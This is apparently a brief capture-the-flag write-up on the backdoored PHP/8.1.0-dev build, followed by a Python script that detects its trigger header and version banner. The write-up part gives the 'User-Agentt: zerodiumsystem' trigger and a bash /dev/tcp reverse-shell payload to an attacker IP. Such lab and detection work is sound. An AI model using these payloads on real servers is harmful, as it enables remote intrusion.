Looking at the response headers we see:
```plaintext
X-Powered-By: PHP/8.1.0-dev
```
This version has a backdoor (https://www.exploit-db.com/exploits/49933) which we can abuse.
It uses a second, special `User-Agentt` header to execute code.
```plaintext
"User-Agentt": "zerodiumsystem('<cmd>');"
```
Getting a reverse shell:
```plaintext
User-Agentt: zerodiumsystem('bash -c "bash -i >& /dev/tcp/10.8.119.137/4444 0>&1"');
```
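Seen from the detection side, both the banner and the trigger header above are easy to match on. The following is an added example, not part of the original write-up: it flags raw requests that carry a `User-Agentt` header and responses that advertise `PHP/8.1.0-dev`. The function names, severity labels and sample messages are constructed for illustration.

```python
import re

# Header name the backdoor reads (note the doubled "t") and the marker
# seen in the value on this page. HTTP header names are case-insensitive.
BACKDOOR_HEADER = "user-agentt"
TRIGGER_MARKER = "zerodium"
BACKDOORED_BANNER = re.compile(r"PHP/8\.1\.0-dev", re.IGNORECASE)

def parse_headers(raw: str) -> list[tuple[str, str]]:
    """Return (lower-cased name, value) pairs, keeping duplicate headers."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    pairs = []
    for line in head.split("\n")[1:]:  # skip the request/status line
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip().lower(), value.strip()))
    return pairs

def inspect_request(raw: str) -> list[str]:
    """Return one severity label per User-Agentt header found."""
    findings = []
    for name, value in parse_headers(raw):
        if name != BACKDOOR_HEADER:
            continue
        # No legitimate client sends this header, so its presence alone is
        # worth an alert; the marker in the value raises the severity.
        findings.append("high" if TRIGGER_MARKER in value.lower() else "medium")
    return findings

def server_is_backdoored_build(raw_response: str) -> bool:
    """True when the response advertises the PHP/8.1.0-dev banner."""
    return any(name == "x-powered-by" and BACKDOORED_BANNER.fullmatch(value)
               for name, value in parse_headers(raw_response))

# Constructed sample messages (not captured traffic).
BENIGN = "GET / HTTP/1.1\r\nHost: app.example\r\nUser-Agent: curl/8.0\r\n\r\n"
TRIGGER = ("GET / HTTP/1.1\r\nHost: app.example\r\nUser-Agent: curl/8.0\r\n"
           "User-Agentt: zerodiumsystem('<cmd>');\r\n\r\n")
PROBE = "GET / HTTP/1.1\r\nHost: app.example\r\nUSER-AGENTT: test\r\n\r\n"
RESPONSE = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
            "X-Powered-By: PHP/8.1.0-dev\r\n\r\n<html></html>")

if __name__ == "__main__":
    for label, msg in [("benign", BENIGN), ("trigger", TRIGGER), ("probe", PROBE)]:
        print(label, inspect_request(msg))
    print("backdoored build:", server_is_backdoored_build(RESPONSE))
```

Most default access-log formats record `User-Agent` but not arbitrary headers, so this check needs full request headers from a proxy, WAF or packet capture.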